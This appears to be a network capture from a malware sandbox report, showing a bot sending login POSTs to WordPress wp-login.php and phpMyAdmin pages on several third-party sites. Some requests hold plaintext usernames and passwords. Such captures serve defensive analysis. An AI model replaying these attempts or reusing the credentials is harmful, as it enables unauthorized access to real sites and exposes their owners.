2024-02-20 23:26:21 UTC	16384	IN	Data Raw: 2e 32 63 2d 32 2e 30 38 33 2c 30 20 2d 33 2e 38 34 32 2c 31 2e 33 34 31 20 2d 34 2e 35 30 34 2c 33 2e 32 6c 2d 35 2e 33 39 2c 30 63 2d 30 2e 36 36 34 2c 2d 31 2e 38 35 39 20 2d 32 2e 34 32 33 2c 2d 33 2e 32 20 2d 34 2e 35 30 36 2c 2d 33 2e 32 63 2d 32 2e 30 38 33 2c 30 20 2d 33 2e 38 34 32 2c 31 2e 33 34 31 20 2d 34 2e 35 30 34 2c 33 2e 32 6c 2d 31 2e 38 39 36 2c 30 6c 30 2c 2d 31 2e 36 63 30 2c 2d 31 2e 37 36 36 20 31 2e 34 33 35 2c 2d 33 2e 32 20 33 2e 32 2c 2d 33 2e 32 6c 32 32 2e 32 37 32 2c 30 63 30 2e 30 37 35 2c 30 2e 35 32 35 20 30 2e 31 32 38 2c 31 2e 30 35 36 20 30 2e 31 32 38 2c 31 2e 36 6c 30 2c 33 2e 32 5a 22 0a 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 22 20 2f 3e 0a 20 20 20 20 Data Ascii: .2c-2.083,0 -3.842,1.341 -4.504,3.2l-5.39,0c-0.664,-1.859 -2.423,-3.2 -4.506,-3.2c-2.083,0 -3.842,1.341 -4.504,3.2l-1.896,0l0,-1.6c0,-1.766 1.435,-3.2 3.2,-3.2l22.272,0c0.075,0.525 0.128,1.056 0.128,1.6l0,3.2Z" style="fill-rule:nonzero;" />
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 22 4d 32 32 2e 34 32 2c 30 6c 36 2e 36 37 31 2c 36 2e 36 37 31 6c 30 2c 32 32 2e 34 32 63 30 2c 31 2e 36 30 36 20 2d 31 2e 33 30 35 2c 32 2e 39 30 39 20 2d 32 2e 39 30 39 2c 32 2e 39 30 39 6c 2d 32 30 2e 33 36 34 2c 30 63 2d 31 2e 36 30 34 2c 30 20 2d 32 2e 39 30 39 2c 2d 31 2e 33 30 33 20 2d 32 2e 39 30 39 2c 2d 32 2e 39 30 39 6c 30 2c 2d 32 36 2e 31 38 32 63 30 2c 2d 31 2e 36 30 34 20 31 2e 33 30 35 2c 2d 32 2e 39 30 39 20 32 2e 39 30 39 2c 2d 32 2e 39 30 39 6c 31 36 2e 36 30 32 2c 30 5a 6d 33 2e 37 36 33 2c 32 39 2e 30 39 31 6c 2d 30 2e 30 30 31 2c 2d 32 30 2e 33 36 34 6c 2d 35 2e 38 31 38 2c 30 6c 30 2c 2d 35 2e 38 31 38 6c 2d 31 34 2e 35 34 36 2c 30 6c 30 2c 32 36 2e 31 38 32 6c 32 30 2e 33 36 35 2c 30 5a 6d 2d 31 33 2e 30 39 32 2c 2d 32 2e 39 30 39 Data Ascii: "M22.42,0l6.671,6.671l0,22.42c0,1.606 -1.305,2.909 -2.909,2.909l-20.364,0c-1.604,0 -2.909,-1.303 -2.909,-2.909l0,-26.182c0,-1.604 1.305,-2.909 2.909,-2.909l16.602,0Zm3.763,29.091l-0.001,-20.364l-5.818,0l0,-5.818l-14.546,0l0,26.182l20.365,0Zm-13.092,-2.909
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 68 72 65 66 3d 22 2f 64 69 64 61 74 74 69 63 61 2f 6f 66 66 65 72 74 61 2d 66 6f 72 6d 61 74 69 76 61 22 20 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 4f 66 66 65 72 74 61 20 66 6f 72 6d 61 74 69 76 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 64 69 64 61 74 74 69 63 61 2f 73 63 68 65 64 65 22 20 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 4c 65 20 73 63 68 65 64 65 20 64 69 64 61 74 Data Ascii: href="/didattica/offerta-formativa" tabindex="-1">Offerta formativa</a> </li> <li > <a href="/didattica/schede" tabindex="-1">Le schede didat
2024-02-20 23:26:22 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 61 64 67 65 20 62 61 64 67 65 2d 73 6d 20 62 61 64 67 65 2d 70 69 6c 6c 20 62 61 64 67 65 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 22 20 6e 61 6d 65 3d 22 63 65 72 63 61 22 20 76 61 6c 75 65 3d 22 41 6c 75 6e 6e 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 6c 75 6e 6e 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a Data Ascii: <button type="submit" class="badge badge-sm badge-pill badge-outline-primary" name="cerca" value="Alunni"> Alunni </button>
2024-02-20 23:26:22 UTC	16334	IN	Data Raw: 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 6c 62 6f 20 6f 6e 6c 69 6e 65 20 2d 20 6c 69 6e 6b 20 65 73 74 65 72 6e 6f 20 2d 20 61 70 65 72 74 75 72 61 20 6e 75 6f 76 61 20 73 63 68 65 64 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 20 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 20 61 6c 74 3d 22 41 6c 62 6f 20 6f 6e 6c 69 6e 65 22 20 73 72 63 3d 22 2f 61 6c 6c 65 67 61 74 69 2f 62 61 Data Ascii: ener noreferrer" aria-label="Albo online - link esterno - apertura nuova scheda"> ... <div class="icon d-inline-block"> <img class="img-fluid" alt="Albo online" src="/allegati/ba
2024-02-20 23:26:22 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
291	192.168.2.6	57321	144.91.85.110	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	166	OUT	GET /admin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:21 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:21 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:21 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
292	192.168.2.6	57162	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	354	OUT	POST /wp-login.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://amsantechnology.com/wp-login.php Content-Length: 158 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:20 UTC	158	OUT	Data Raw: 6c 6f 67 3d 73 61 6e 74 6f 73 68 25 34 30 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 26 70 77 64 3d 65 64 65 34 64 65 6c 65 63 35 61 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=santosh%40amsantechnology.com&pwd=ede4delec5a&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Famsantechnology.com%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:21 UTC	375	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:21 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:21 UTC	6466	IN	Data Raw: 31 39 33 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 41 6d 73 61 6e 20 54 65 63 68 6e 6f 6c 6f 67 79 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 Data Ascii: 1935<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Amsan Technology — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='style

Session ID	Source IP	Source Port	Destination IP	Destination Port
293	192.168.2.6	57445	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	216	OUT	GET / HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=1jcqg67re2d1lpt5kl3hrj1r8h User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:21 UTC	360	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://sell.sawbrokers.com/domain/stylesense.co.uk/
2024-02-20 23:26:21 UTC	13	IN	Data Raw: 33 0d 0a 20 20 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 3 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
294	192.168.2.6	57446	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:20 UTC	354	OUT	POST /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP+Cookie+check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://norwegischlernen.info/wp-login.php Content-Length: 136 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:20 UTC	136	OUT	Data Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 46 75 63 6b 6d 79 6c 69 66 65 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=admin&pwd=Fuckmylife1&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fnorwegischlernen.info%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:21 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5766 date: Tue, 20 Feb 2024 23:26:21 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:21 UTC	5766	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port
295	192.168.2.6	57906	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:21 UTC	185	OUT	GET /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:22 UTC	800	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CovdGfxubch9l1d2NmW4nwkpmCneBzFhBEHXryjx0YvfZMxBxRFdUM9fob5pnK28rZY1iXSKvRp3JKkzFmqGWnFYuRTnGSYYZB8uG36JWgRV1LBG8hNf0EMANcG3t%2BEb0dHaOT3AY5dnpg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a839becc36a59-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:22 UTC	569	IN	Data Raw: 31 61 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1a06<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 Data Ascii: heet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' type='text/css'
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 0a 09 09 3c 66 6f 72 6d 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 Data Ascii: https://wordpress.org/">Powered by WordPress</a></h1><form name="loginform" id="loginform" action="https://fortressrealcapital.com/wp-login.php" method="post"><p><label for="user_login">Username or Email Address</label><input type="text
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 0a 09 09 09 3c 2f 70 3e 0a 09 09 3c 2f 66 6f 72 6d 3e 0a 0a 09 09 09 09 09 3c 70 20 69 64 3d 22 6e 61 76 22 3e 0a 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 77 70 2d 6c 6f 67 69 6e 2d 6c 6f 73 74 2d 70 61 73 73 77 6f 72 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 3f 61 63 74 69 6f 6e 3d 6c 6f 73 74 70 61 73 73 77 6f 72 64 22 3e 4c 6f 73 74 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 Data Ascii: </p></form><p id="nav"><a class="wp-login-lost-password" href="https://fortressrealcapital.com/wp-login.php?action=lostpassword">Lost your password?</a></p><script type="text/javascript">/* <![CDATA[ */function wp_attempt_focus
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 69 6e 65 72 74 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 30 2e 31 34 2e 30 22 20 69 64 3d 22 72 65 67 65 6e 65 72 61 74 6f 72 2d 72 75 6e 74 69 6d 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 Data Ascii: d="wp-polyfill-inert-js"></script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0" id="regenerator-runtime-js"></script><script type="text/javascript" src="https://fort
2024-02-20 23:26:22 UTC	625	IN	Data Raw: 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 77 70 2d 75 74 69 6c 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 61 6a 61 78 22 3a 7b 22 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f Data Ascii: s"></script><script type="text/javascript" id="wp-util-js-extra">/* <![CDATA[ /var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js/
2024-02-20 23:26:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
296	192.168.2.6	57743	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:21 UTC	398	OUT	POST /phpmyadmin/index.php?route=/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: phpMyAdmin_https=j26t0os1ij0b028ku3l4hk3shb; pma_lang_https=en User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/phpmyadmin/ Content-Length: 162 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:21 UTC	162	OUT	Data Raw: 72 6f 75 74 65 3d 25 32 46 26 6c 61 6e 67 3d 65 6e 26 74 6f 6b 65 6e 3d 35 37 32 34 32 37 35 63 33 37 32 62 37 36 34 66 35 64 32 65 36 35 33 32 33 63 35 35 34 31 32 37 26 73 65 74 5f 73 65 73 73 69 6f 6e 3d 6a 32 36 74 30 6f 73 31 69 6a 30 62 30 32 38 6b 75 33 6c 34 68 6b 33 73 68 62 26 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 73 65 72 76 65 72 3d 31 Data Ascii: route=%2F&lang=en&token=5724275c372b764f5d2e65323c554127&set_session=j26t0os1ij0b028ku3l4hk3shb&pma_username=fortressrealcapital&pma_password=fortress%21&server=1
2024-02-20 23:26:22 UTC	1361	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:22 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: phpMyAdmin_https=n1bbclntco2h47u5336l7bs6t5; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: 